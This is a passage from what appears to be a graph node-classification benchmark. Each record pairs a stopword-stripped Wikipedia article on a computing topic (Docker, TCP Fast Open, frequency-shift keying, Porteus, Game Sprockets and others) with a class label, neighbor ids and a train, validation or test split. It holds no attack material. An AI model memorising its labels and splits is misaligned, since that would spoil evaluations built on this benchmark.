    "text": "SGI_1600SW:sgi 1600sw 1600sw widescreen flat panel video monitor silicon graphics introduced 1998 many awards release sold 54,000 units notable longevity used models still actively traded ebay decade later despite difficulty adapting monitor run modern video cards due 1600sw openldi video interface formac sold monitor bundled openldi graphics adapter formac pronitron 18/500 radius sold monitor artica differed mainly translucent white case conventional mount sgi sold monitor primarily model am173y01 1600sw revolutionary time featuring 17.3 inch diagonal wide screen panel market dominated crt monitors 1600sw 25:16 aspect ratio referred sgi superwide resolution 1600 x 1024 pixels refresh rate 60 hz 24-bit color 110 dpi makes smaller dot pitch competitive monitors 1600sw shared styling motif sgi visual workstation 320 540 o2 unique troublesome off-center mount display dozen international awards despite age still compares well modern displays produced decade later introduction 1600sw cost neighborhood 2500 4-way monitor switch dr. bott called moniswitch pro ldi allows sharing openldi display among 4 computers must equipped openldi graphics adapter openldi rarely used today popular home office lcd panel monitors use dvi vga standard connector several companies make adapter boxes allow continued use older displays adapters developed 1600sw monitor sgi referred video cards support 1600sw 1600 x 1024 resolution super wide savvy modern cards trouble resolution pc based machines problems screen distortion exist system boot apple macintoshes boot directly proper resolution thus little work 1600sw adapted almost modern computer according original sgi project manager dan evanicky common failure items backlights power supplies point dan expects power supply continuous use failed though monitor likely fine monitors left continuous decade likely faded backlights generic power supplies work unit specifications 3 amps 12 volts 5.5m x 2.5mm center positive coaxial barrel preferably right angle 2005 mr. evanicky purchased entire spares inventory sitting mitsubishi japan order supply enthusiasts repair parts",
    "neighbors": [
      10051,
      7311
    ],
    "mask": "None"
  },
  {
    "node_id": 2910,
    "label": 2,
    "text": "Docker_(software):docker software docker set platform-as-a-service paas products use operating-system-level virtualization deliver software packages called containers containers isolated one another bundle software libraries configuration files communicate well-defined channels containers run single operating-system kernel thus lightweight virtual machines service free premium tiers software hosts containers called docker engine first started 2013 developed docker inc. docker inc. founded solomon hykes sebastien pahl combinator summer 2010 startup incubator group launched 2011 hykes started docker project france internal project within dotcloud platform-as-a-service company initial contributors dotcloud engineers including andrea luzzardi francois-xavier bourlet jeff lindsay also became involved independent collaborator docker debuted public santa clara pycon 2013 released open-source march 2013 time used lxc default execution environment one year later release version 0.9 docker replaced lxc component written go programming language october 15 2014 microsoft announced integration docker engine next windows server release native support docker client role windows june 8 2016 microsoft announced docker could used natively windows 10 hyper-v containers build ship run containers utilizing windows server 2016 technical preview 5 nano server container os image since feature known windows containers made available windows 10 windows server 2016 two types windows containers windows server containers hyper-v isolation former nothing docker falls outside scope article latter however form hardware virtualization opposed os-level virtualization uses docker deliver guest os image guest os image windows nano server image 652 mb size separate end-user license agreement may 6 2019 microsoft announced second version windows subsystem linux wsl version wsl integrates full linux kernel windows 10 docker inc. announced started working version docker windows runs wsl 2 instead full virtual machine according linux.com docker package application dependencies virtual container run linux server helps enable flexibility portability application run whether on-premises public cloud private cloud docker uses resource isolation features linux kernel cgroups kernel namespaces union-capable file system overlayfs allow containers run within single linux instance avoiding overhead starting maintaining virtual machines docker containers lightweight single server virtual machine run several containers simultaneously 2016 analysis found typical docker use case involves running five containers per host many organizations run 10 linux kernel support namespaces mostly isolates application view operating environment including process trees network user ids mounted file systems kernel cgroups provide resource limiting memory cpu since version 0.9 docker includes component called directly use virtualization facilities provided linux kernel addition using abstracted virtualization interfaces via libvirt lxc systemd-nspawn docker implements high-level api provide lightweight containers run processes isolation docker software service offering consists three components",
    "neighbors": [
      6150,
      2058,
      3082,
      6154,
      10774,
      5660,
      4149,
      7733,
      10303,
      5697,
      581,
      5702,
      7248,
      2645,
      10854,
      9839,
      9844,
      7802,
      4238,
      11410,
      7315,
      4761,
      9882,
      2212,
      3237,
      5800,
      6834,
      7349,
      2230,
      2236,
      10447,
      10977,
      5356,
      9964,
      6383,
      9455,
      5363,
      2804,
      8439,
      5879,
      3323,
      253,
      8447,
      5378,
      8466,
      11030,
      11542,
      8986,
      11041,
      6438,
      295,
      10537,
      1325,
      7983,
      9525,
      823,
      318,
      10566,
      8520,
      3914,
      6993,
      1362,
      6483,
      7507,
      6999,
      2397,
      349,
      863,
      4958,
      10597,
      368,
      7537,
      2949,
      4505,
      1435,
      10153,
      4011,
      7607,
      9655,
      5049,
      5070,
      467,
      11221,
      982,
      1513,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 2911,
    "label": 5,
    "text": "Contention_(telecommunications):contention telecommunications statistical time division multiplexing contention media access method used share broadcast medium contention computer network transmit data time first come-first served system breaks two computers attempt transmit time known collision avoid collisions carrier sensing mechanism used computer listens network attempting transmit network busy waits network quiets carrier detection computers continue listen network transmit computer detects another signal interferes signal sending stops transmitting computers wait random amount time attempt transmit contention methods popular media access control method lans one method handle collisions contention based system optimize collision detection subsequent recovery alternative method handle collisions contention based system attempt avoid systems may utilize strict scheduling guideline identify may use resources systems may senders listen channel immediately prior transmitting determine suitable times transmit collisions condition arises two data stations attempt transmit time shared channel two data stations attempt transmit time half duplex communication link contention based channel access multiple access protocol protocol data packet collisions may occur examples protocols telecommunication term contention also following less usual meanings",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      11288,
      2458,
      5020,
      1192,
      11560,
      7723,
      11181,
      7490,
      9284,
      11591,
      5321,
      7498,
      5581,
      2785,
      5092,
      5863,
      2802
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2912,
    "label": 5,
    "text": "Frame_(networking):frame networking frame digital data transmission unit computer networking telecommunication packet switched systems frame simple container single network packet telecommunications systems frame repeating structure supporting time-division multiplexing frame typically includes frame synchronization features consisting sequence bits symbols indicate receiver beginning end payload data within stream symbols bits receives receiver connected system frame transmission ignores data detects new frame synchronization sequence osi model computer networking frame protocol data unit data link layer frames result final layer encapsulation data transmitted physical layer frame unit transmission link layer protocol consists link layer header followed packet frame separated next interframe gap frame series bits generally composed frame synchronization bits packet payload frame check sequence examples ethernet frames point-to-point protocol ppp frames fibre channel frames v.42 modem frames often frames several different sizes nested inside example using point-to-point protocol ppp asynchronous serial communication eight bits individual byte framed start stop bits payload data bytes network packet framed header footer several packets framed frame boundary octets telecommunications specifically time-division multiplex tdm time-division multiple access tdma variants frame cyclically repeated data block consists fixed number time slots one logical tdm channel tdma transmitter context frame typically entity physical layer tdm application examples sonet/sdh isdn circuit-switched b-channel tdma examples circuit switched data used early cellular voice services frame also entity time-division duplex mobile terminal may transmit time slots receive others",
    "neighbors": [
      2306,
      9868,
      2960,
      8989,
      172,
      11181,
      7855,
      2994,
      3383,
      7865,
      5437,
      4543,
      835,
      1478,
      2640,
      6364,
      3168,
      2785,
      2532,
      5092,
      1127,
      2793,
      8432,
      7411,
      5497,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 2913,
    "label": 7,
    "text": "Heartbeat_(computing):heartbeat computing computer science heartbeat periodic signal generated hardware software indicate normal operation synchronize parts computer system usually heartbeat sent machines regular interval order seconds endpoint receive heartbeat time—usually heartbeat intervals—the machine sent heartbeat assumed failed heartbeat protocol generally used negotiate monitor availability resource floating ip address typically heartbeat starts machine perform election process machines heartbeat network determine machine owns resource heartbeat networks two machines important take account partitioning two halves network could functioning able communicate situation important resource owned one machine one machine partition heartbeat intended used indicate health machine important heartbeat protocol transport runs reliable possible causing failover false alarm may depending resource highly undesirable also important react quickly actual failure important heartbeat reliable reason often desirable heartbeat running one transport instance ethernet segment using udp/ip serial link",
    "neighbors": [
      5472,
      4274,
      11413,
      3927,
      3450,
      3006
    ],
    "mask": "None"
  },
  {
    "node_id": 2914,
    "label": 2,
    "text": "Porteus_(operating_system):porteus operating system porteus formerly slax remix portable operating system based slackware require installation run fixed removable media usb flash drive compact disc porteus available 32-bit 64-bit version porteus project started slax remix beginning 2010 started community project using zen kernel improve update slax os community agreed new name project porteus named 'portability 'proteus 'proteus greek god sea capable changing form according naming announcement porteus forum project leader commented name find name kind synonym 'flexibility portable small flexible modular features included one name porteus porteus 4.0 available seven desktop variants cinnamon kde plasma 5 lxde lxqt mate openbox xfce porteus based substantially modified optimized version linux live scripts run disk usb stick changes saved onto portable device installed hard drive porteus even installed within another system without need create new partition porteus preloaded variety software user selects installing system downloaded selecting various options menu including one four windows management systems browser features porteus uses package manager utilizing slackware porteus kiosk specialized edition porteus operating system minimalist linux distribution web-only terminals firefox google chrome chromium opera set upon installation sole application porteus kiosk provides users locked computing environment designed deployed schools offices public libraries internet cafés business establishment provides internet access clients porteus kiosk installed cd/dvd usb flash drive hard drive bootable storage media compact flash sd/mmc memory cards prior installation system customized kiosk wizard utility allows system browser related tweaks porteus kiosk system open source available free-of-charge although number commercial services custom builds automatic updates software upgrades available version 3.7.0 porteus kiosk able run 32-bit i486 greater 64-bit x86_64 machines google chrome n't support 32-bit machines anymore developers distribution decided follow path hence release 4.0.0 porteus kiosk supports x86_64 architecture system lightweight terms size resources used default image 80 mb size custom kiosk iso depend choice added extra components adobe flash java additional fonts factors reviewing porteus 1.0 june 2011 joe zonker brockmeier wrote users 've missed kde 3.5.x treat porteus portable linux distribution offers 32-bit release trinity fork kde 3.5.x 64-bit release offers kde 4.6.4 distribution appeal everyone might interest enthusiasts live cd distributions old-school kde fans concluded ... porteus looks like nice portable linux distribution aimed expert least experienced linux users something appeal majority linux users particularly users prefer slightly larger depth available packages users nursing older hardware prefer portable distribution porteus interesting project custom live cd iso creation linux magazine wrote issue 160/2014 build portable linux distro porteus building customized linux distribution daunting proposition – unless use porteus wizard clever simple service lets create custom live cd distro fits usb stick loads ram",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      10780,
      543,
      11297,
      3618,
      7204,
      9253,
      11305,
      5677,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      10817,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      7812,
      8326,
      8837,
      9353,
      9873,
      11410,
      2195,
      8857,
      10394,
      6301,
      1694,
      5279,
      10397,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      2230,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      1761,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      7938,
      4355,
      4360,
      7435,
      2321,
      1813,
      5397,
      4887,
      6934,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      4493,
      10127,
      912,
      11155,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      4011,
      9646,
      1455,
      948,
      439,
      9660,
      10694,
      4039,
      5067,
      975,
      8147,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 2915,
    "label": 9,
    "text": "Beta_BASIC:beta basic beta basic basic interpreter sinclair research zx spectrum microcomputer written dr andy wright 1983 sold one-man software house betasoft betasoft also produced regular newsletter/magazine betanews originally started basic toolkit time grew full replacement beta basic completely replaced sinclair basic common time also os providing command line interface cli thus beta basic provided new improved cli editor supported sinclair idiosyncratic single-key entry system basic keywords also allowed keywords spelled letter-for-letter also removed necessity memorising sometimes arcane key combinations necessary enter less-commonly-used basic keywords however single-key entry system also extended mapping spectrum 'graphics characters beta basic new keywords switch keyword entry typed entry merely necessary type single space causing cursor mode change k keyword l lowercase c capital keywords statement could also used alter behaviour example disabling k mode editor listing could optionally automatically prettyprint code possible manually sinclair basic automatic indentation advantage highlighting certain types coding error primarily failing correctly close constructs editing improvements included automatic highlighting current-line indicator small tweak disproportionately helpful ability move cursor well left right huge boon editing long lines combined 64-column display see new functionality section improvements made beta basic much productive environment even coding standard sinclair basic making use betasoft language additions beta basic also basic interpreter right bypassing spectrum rom used library occasionally made calls rom access useful functions worth re-implementing beta basic either rom routines good enough reasons space beta basic run 48 kb memory available spectrum still leave room user code time beta basic sophisticated provided full structured programming named procedures functions complete local variables allowing programming using recursion although supported line numbers necessary offered mode operation completely suppressed display line numbers 128k spectrum machines beta basic provided extended facilities allowing programmers access machine extra memory took form ram disk well allowing programmer save load programs blocks memory screen images ram disc catalogue contents ram disk beta basic also provided commands creation use arrays held ram disk allowing programs running 30 kb free memory spectrum manipulate arrays approaching 80 kb significant extra amount space 1980s standards almost 8-bit basic generally limited 64 kb program data combined beta basic also drove spectrum 256x192 pixel display directly eliminating restrictions rom 32-column text display beta basic offered scalable screen fonts special soft font 4 pixels wide still legible meant beta basic could display 64 columns text across screen making comparable newer 8-bit machines 80-column displays user prepared tolerate characters displayed without gaps 85 column display possible readable allow easy porting basic applications designed 80-column screen text size could controlled programmatically part program display might use 64-column text part 32-column text enlarged reduced intermediate sizes special versions produced users interface 1 zx microdrive subsequently opus discovery disciple plusd disk interfaces well version amstrad spectrum +3 also consideration wright discarded project beta basic suffered limitations 8-bit microprocessors spectrum could address 64 kb contiguous memory due addressing restrictions spectrum zilog z80 cpu 16 kb taken sinclair basic rom leaving 48 kb ram screen took areas used holding interpreter internal data structures beta basic took around 11-12 kb remainder cases leaving 20 kb user programs replacement sinclair editor meant possible use 128k spectrum rom full-screen basic editor compiler available beta basic code existing sinclair basic compilers hisoft basic could handle extended keywords facilities beta basic another remaining sinclair basic limitation single-letter variable names could used strings arrays types 8-bit basic inbuilt support structured programming bbc basic beta basic named procedures need called proc keyword like bbc basic thus became new language keywords allowing language extended however bbc basic considerably quicker fastest basic interpreter time beta basic especially fast though included faster replacements particularly slow rom routines circle arc drawing code development sophisticated new successor spectrum sam coupé alan miles bruce gordon miles gordon technology approached betasoft contracted wright provide basic new machine provided complete basic interpreter drew extensively upon beta basic differently structured language right sinclair rom call upon work around sam basic largely compatible beta basic operated similar manner except areas sam hardware significantly different sam screen extended memory betasoft later released extension sam basic named masterbasic",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      9188,
      5733,
      11243,
      2541,
      8429,
      9714,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 2916,
    "label": 3,
    "text": "Xconfig:xconfig xconfig short codice_1 target linux makefile graphical linux compilation utility uses qt xconfig utility invoked running codice_2 base linux source directory qt used since kernel 2.6 kernel 2.4 uses tcl/tk configuration interface gtk+ interface codice_3 also available since kernel 2.6",
    "neighbors": [
      7983,
      692,
      823,
      2809,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2917,
    "label": 4,
    "text": "Marie_Meyer_(linguist):marie meyer linguist marie anne meyer april 7 1897 – 1969 american linguist spy worked national security agency 1943-60 assigned venona project credited making first recoveries venona codebook studied eight foreign languages first person receive nsa meritorious civilian service award meyer born april 7 1897 raised bloomington illinois attended illinois normal state university normal illinois graduated bachelor degree education 1919 began teaching schools graduation continued education summer sessions university chicago studying french latin august 1930 received master degree latin 1930s 1940s continued study languages taking summer classes sanskrit greek german 1943 meyer hired signal security agency likely german linguist summer 1946 took university chicago course russian assigned venona project national security agency credited making first recoveries venona codebook rest career meyer worked facets russian problem taught russian classes nsa training school 1950 nsa memorandum described meyer highly professional russian linguist holding highest level competency meyer retired 1960 first person receive meritorious civilian service award spent retirement years engaging research catholic university celtic languages died illinois december 1969",
    "neighbors": [
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 2918,
    "label": 3,
    "text": "Senjyo:senjyo senjyo センジョー arcade game developed 1983 tehkan known tecmo title game translates japanese 'battlefield simple gameplay involves player controlling fixed turret tank shooting oncoming alien enemies cross-hair target certain number enemies must destroyed progress next stage original arcade cabinet cocktail table game ported published sony corporation 1984 msx computers 2005 senjyo re-released exclusively xbox part tecmo classic arcade collection",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2919,
    "label": 2,
    "text": "Windows_10_Mobile_version_history:windows 10 mobile version history windows 10 mobile mobile operating system developed microsoft released manufacturing november 20 2015 made generally available march 17 2016 october 2017 microsoft announced would pause active development windows 10 mobile last feature update fall creators update future development windows 10 mobile limited maintenance releases security patches windows 10 mobile november update also known version 1511 codenamed threshold 2 first major update windows 10 mobile one series updates threshold codenames carries build number 10.0.10586 released public november 12 2015 update reached end service january 9 2018 windows 10 mobile anniversary update also known version 1607 codenamed redstone 1 second major update windows 10 mobile first series updates redstone codenames carries build number 10.0.14393 first preview released february 19 2016 released public august 16 2016 update reached end service release build 14393.2551 october 9 2018 windows 10 mobile creators update also known version 1703 codenamed redstone 2 third major update windows 10 mobile second series updates redstone codenames carries build number 10.0.15063 first preview released insiders august 17 2016 released public april 25 2017 update reached end service release build 15063.1868 june 11 2019 windows 10 mobile fall creators update also known version 1709 codenamed redstone 3 third major update windows 10 mobile third series updates redstone codenames carries build number 10.0.15254 despite sharing codename version number pc version windows 10 fall creators update redstone 3 update still build part redstone 2 branch first preview released insiders april 14 2017 released public october 24 2017 update set reached end service december 10 2019",
    "neighbors": [
      5643,
      4624,
      11283,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      11301,
      6697,
      10281,
      1581,
      2101,
      8757,
      10812,
      7229,
      3648,
      582,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      8798,
      3170,
      10338,
      8296,
      617,
      5225,
      8299,
      622,
      9839,
      4210,
      7796,
      6265,
      7290,
      4731,
      636,
      8315,
      639,
      10879,
      641,
      8841,
      651,
      6797,
      2193,
      9874,
      2196,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      6827,
      3250,
      5300,
      9910,
      2749,
      4289,
      200,
      9420,
      10957,
      2259,
      4316,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      4356,
      11524,
      782,
      3856,
      3857,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      7970,
      5413,
      1832,
      3881,
      6441,
      10024,
      10026,
      10029,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      321,
      3394,
      9033,
      3922,
      11605,
      2391,
      4439,
      5465,
      11103,
      2402,
      4458,
      6506,
      9593,
      2943,
      8576,
      3463,
      1418,
      5003,
      5004,
      1935,
      8080,
      4505,
      11677,
      929,
      4515,
      11683,
      3496,
      430,
      6062,
      9655,
      6584,
      1978,
      7615,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      4051,
      8659,
      9173,
      11221,
      1498,
      5594,
      478,
      5600,
      6114,
      6115,
      8681,
      4074,
      6637,
      9709,
      5103,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 2920,
    "label": 4,
    "text": "Frequency-shift_keying:frequency-shift keying frequency-shift keying fsk frequency modulation scheme digital information transmitted discrete frequency changes carrier signal technology used communication systems telemetry weather balloon radiosondes caller id garage door openers low frequency radio transmission vlf elf bands simplest fsk binary fsk bfsk bfsk uses pair discrete frequencies transmit binary 0s 1s information scheme 1 called mark frequency 0 called space frequency reference implementations fsk modems exist documented detail demodulation binary fsk signal done using goertzel algorithm efficiently even low-power microcontrollers principle fsk implemented using completely independent free-running oscillators switching beginning symbol period general independent oscillators phase therefore amplitude switch-over instant causing sudden discontinuities transmitted signal practice many fsk transmitters use single oscillator process switching different frequency beginning symbol period preserves phase elimination discontinuities phase therefore elimination sudden changes amplitude reduces sideband power reducing interference neighboring channels rather directly modulating frequency digital data symbols instantaneously changing frequency beginning symbol period gaussian frequency-shift keying gfsk filters data pulses gaussian filter make transitions smoother filter advantage reducing sideband power reducing interference neighboring channels cost increasing intersymbol interference used dect bluetooth cypress wirelessusb nordic semiconductor texas instruments lprf z-wave wavenis devices basic data rate bluetooth minimum deviation 115 khz gfsk modulator differs simple frequency-shift keying modulator baseband waveform levels −1 +1 goes fsk modulator passed gaussian filter make transitions smoother limit spectral width gaussian filtering standard way reducing spectral width called pulse shaping application ordinary non-filtered fsk jump −1 +1 +1 −1 modulated waveform changes rapidly introduces large out-of-band spectrum pulse changed going −1 +1 −1 −0.98 −0.93 … +0.93 +0.98 +1 smoother pulse used determine carrier frequency out-of-band spectrum reduced minimum frequency-shift keying minimum-shift keying msk particular spectrally efficient form coherent fsk msk difference higher lower frequency identical half bit rate consequently waveforms represent 0 1 bit differ exactly half carrier period maximum frequency deviation δ 0.25 f f maximum modulating frequency result modulation index 0.5 smallest fsk modulation index chosen waveforms 0 1 orthogonal variant msk called gaussian minimum-shift keying gmsk used gsm mobile phone standard audio frequency-shift keying afsk modulation technique digital data represented changes frequency pitch audio tone yielding encoded signal suitable transmission via radio telephone normally transmitted audio alternates two tones one mark represents binary one space represents binary zero afsk differs regular frequency-shift keying performing modulation baseband frequencies radio applications afsk-modulated signal normally used modulate rf carrier using conventional technique fm transmission afsk always used high-speed data communications since far less efficient power bandwidth modulation modes addition simplicity however afsk advantage encoded signals pass ac-coupled links including equipment originally designed carry music speech afsk used u.s.-based emergency alert system notify stations type emergency locations affected time issue without actually hearing text alert phase 1 radios project 25 system use continuous 4-level fm c4fm modulation 1910 reginald fessenden invented two-tone method transmitting morse code dots dashes replaced different tones equal length intent minimize transmission time early cw transmitters employed arc converter could conveniently keyed instead turning arc key slightly changed transmitter frequency technique known compensation-wave method compensation-wave used receiver spark transmitters used method consumed lot bandwidth caused interference discouraged 1921 early telephone-line modems used audio frequency-shift keying afsk send receive data rates 1200 bits per second bell 103 bell 202 modems used technique even today north american caller id uses 1200 baud afsk form bell 202 standard early microcomputers used specific form afsk modulation kansas city standard store data audio cassettes afsk still widely used amateur radio allows data transmission unmodified voiceband equipment afsk also used united states emergency alert system transmit warning information used higher bitrates weathercopy used weatheradio noaa u.s chu shortwave radio station ottawa ontario canada broadcasts exclusive digital time signal encoded using afsk modulation frequency-shift keying fsk commonly used telephone lines caller id displaying callers numbers remote metering applications several variations technology countries europe european telecommunications standards institute etsi standards 200 778-1 -2 – replacing 300 778-1 -2 – allow 3 physical transport layers telcordia technologies formerly bellcore british telecom bt cable communications association cca combined 2 data formats multiple data message format mdmf single data message format sdmf plus dual-tone multi-frequency dtmf system no-ring mode meter-reading like recognition different types exist attempt define single standard telcordia technologies formerly bellcore standard used united states canada see australia china hong kong singapore sends data first ring tone uses 1200 bits per second bell 202 tone modulation data may sent sdmf – includes date time number – mdmf adds name field british telecom bt united kingdom developed standard wakes display line reversal sends data ccitt v.23 modem tones format similar mdmf used bt wireless networks like late ionica cable companies details found bt supplier information notes sins 227 242 another useful document designing caller identification delivery using xr-2211 bt exar website cable communications association cca united kingdom developed standard sends information short first ring either bell 202 v.23 tones developed new standard rather change street boxes multiplexors could n't cope bt standard uk cable industry use variety switches nortel dms-100 system x system nokia dx220 note use bt standard instead cca one data format similar bt one transport layer like telcordia technologies north american european equipment likely detect",
    "neighbors": [
      2306,
      10381,
      1550,
      8600,
      2968,
      5020,
      9373,
      5664,
      8736,
      11170,
      8741,
      11686,
      2989,
      2994,
      5304,
      10299,
      7490,
      3140,
      7108,
      3040,
      1121,
      8160,
      7400,
      8950,
      11260
    ],
    "mask": "None"
  },
  {
    "node_id": 2921,
    "label": 2,
    "text": "Game_Sprockets:game sprockets game sprockets collection application programming interfaces apis supporting gaming classic mac os consisted four main parts drawsprocket inputsprocket soundsprocket netsprocket providing library pre-rolled routines common gaming tasks speechsprocket relabelled version speech recognition manager provided speech recognition support quickdraw 3d rave provided 3d hardware acceleration game sprockets first released 1996 saw minor use development cancelled 1997 os x included many features built-in libraries opengl replaced rave 3d acceleration layer netsprocket lives openplay although adoption limited early history macintosh computer strong gaming platform due high-resolution screen digital sound hardware fact every mac came equipped reasonable gaming controller mouse however gaming never supported strong way within apple cases actively discouraged 1990s mac platform greatly increased complexity profusion models different features supporting game across entire lineup required programmer learn intricacies different models time even figuring machine program installed standard solution mid-90s pc gaming evolved powerful market one drivers new computer purchases move ms-dos microsoft windows several microsoft staffers noticed game developers generally ignoring windows due better performance available dos decided windows needed support first-class gaming set ensuring windows would become preferred gaming platform future result introduction directx libraries greatly reduced complexity addressed many performance concerns 3d games became widespread library direct3d became decisive advantage directx grew become almost universal pc gaming mid-90s gaming mac largely dead combination high prices stagnating sales poor performance lack directx-like system resulted game developers leaving mac field droves microsoft several apple staffers took upon redress problem led chris desalvo result two-pronged effort one side game sprockets libraries along rave single target gaming platform pippin game sprockets released 29 march 1996 year wwdc game sprockets one many apple technologies ended development return steve jobs ceo position apple death announced march 1997 press release part wide series layoffs restructuring company moved mac os x based future desalvo wrote fairly lengthy open letter topic noting sprockets might come life future gamesprockets included four main libraries two associated ones discussed turn unlike pre-windows pc system displaying high-resolution color images always easy mac however getting details resolution color depth machine running required number tricks additionally common gaming tasks like switching resolutions fading black intricacies required programmer adjust differences color depth ignored drawsprocket library utilities help programmer address common problems among many separate functions calls allow user select main monitor game multi-screen configurations relatively common cleanly enumerating available resolutions switching various routines fading one image another instead black displaying background images various similar utilities major portion drawsprocket provided abstraction layer page flipping macs included ability page flip hardware others drawsprocket provided single api worked machine using hardware available falling back custom-tuned software blitters related code allowed developers easily create multiple framebuffers draw use page flipping calls quickly display mac always shipped input device suitable gaming mouse even cases devices better suited gaming like joysticks relatively easy make devices emulate mouse keyboard input however model stopped working well joysticks increasing complexity released 1990s new models several axes controlled potentiometers linear input cases mouse emulation simply n't work solution inputsprocket inputsprocket allowed hardware vendor provide driver possible input device driver handled communications input device also presented list capabilities inputsprocket manager inputsprocket displayed installed drivers single universal control panel games linking inputsprocket provided list operations wanted user control control panel user could map operation input apple supplied drivers mice keyboards inputsprocket one widely used game sprockets drivers supplied many devices worked mac greatly expanded mapping inputsprocket onto similar human interface device system part usb standard meant almost usb input device would work least level inputsprocket without effort part developer user macintosh sound manager supported digital sound earliest versions stereo much evolution soundsprocket added support including systems simulate 3d sound programmers could add soundsprocket support programs link in-game objects sounds would appear localized space netsprocket provided abstraction layer made easy developers add networking support games netsprocket supported either appletalk tcp/ip supported naming games player providing passwords used client/server architecture included option allow host run networking code without graphics netsprocket also included functionality assign player id teams player types players observers etc netsprocket also provided code message passing although protocol messages left programmer netsprocket one portion game sprockets lived project whole downsized code released open source apple developed new functionality multiple platform support latest versions support mac os windows linux speechsprocket included game sprockets consisted nothing re-badged version existing speech recognition manager like speechsprocket quickdraw 3d rave considered part overall game sprockets technology although developed supported separately rave thin hardware abstraction layer similar directx direct3d",
    "neighbors": [
      2282,
      6797,
      9166,
      143,
      10975,
      6966,
      10557,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 2922,
    "label": 5,
    "text": "TCP_Fast_Open:tcp fast open computer networking tcp fast open tfo extension speed opening successive transmission control protocol tcp connections two endpoints works using tfo cookie tcp option cryptographic cookie stored client set upon initial connection server client later reconnects sends initial syn packet along tfo cookie data authenticate successful server may start sending data client even reception final ack packet three-way handshake skipping way round-trip delay lowering latency start data transmission cookie generated applying block cipher keyed key held secret server client ip address generating authentication tag difficult third parties spoof even forge source ip address make two-way connections server ip addresses although uses cryptographic techniques generate cookie tfo intended provide security three-way handshake replaces give form cryptographic protection resulting tcp connection provide identity assurance either endpoint also intended resistant man-in-the-middle attacks resistance required may used combination cryptographic protocol tls ipsec tfo proposal originally presented 2011 published rfc 7413 december 2014 tcp fast open shares goal bypassing three-way handshake tcp earlier proposal 1994 called t/tcp rfc 1644 contrast tcp fast open t/tcp paid attention security opening path vulnerabilities failing gain traction tfo implementations include following",
    "neighbors": [
      3744,
      5470,
      9987,
      4326,
      2887,
      6186,
      10924,
      3695,
      823,
      5469,
      3742,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2923,
    "label": 7,
    "text": "Payments_as_a_service:payments service payments service paas marketing phrase used describe software service connect group international payment systems architecture represented layer – overlay – resides top disparate systems provides two-way communications payment system paas communication governed standard apis created paas provider since 1980s credit cards international wire transfer systems like society worldwide interbank financial telecommunication swift primary methods making receiving electronic cross-border payments within individual countries payers payees used various electronic systems make payments united states instance federal reserve bank operates automated clearing house ach system eu countries direct debit preferred method facilitating electronic payments advent world wide web became necessary provide alternative payment systems first consumers hesitant use credit cards web due security concerns entrepreneurs tried market electronic wallet early 1994 cybercash allowed consumers make secure purchases internet cybercash eventually failed march 2000 paypal formed became predominant electronic wallet u.s similar regional services include webmoney yandex.money russia alipay china popular countries significant global reach paypal moneybookers skrill became regional electronic wallets providing greater liquidity still provide free flow funds popular electronic wallet solutions paas designed allow merchants market participants utilize local regional global payments options single interface complexity moving funds providers handled paas layer hidden user generally speaking one interface merchant paas one interface required merchants users required maintain one financial repository",
    "neighbors": [
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2924,
    "label": 4,
    "text": "BeyondCorp:beyondcorp beyondcorp implementation google zero-trust computer security concepts creating zero trust network open source implementation inspired googles research paper access proxy transcend",
    "neighbors": [
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2925,
    "label": 2,
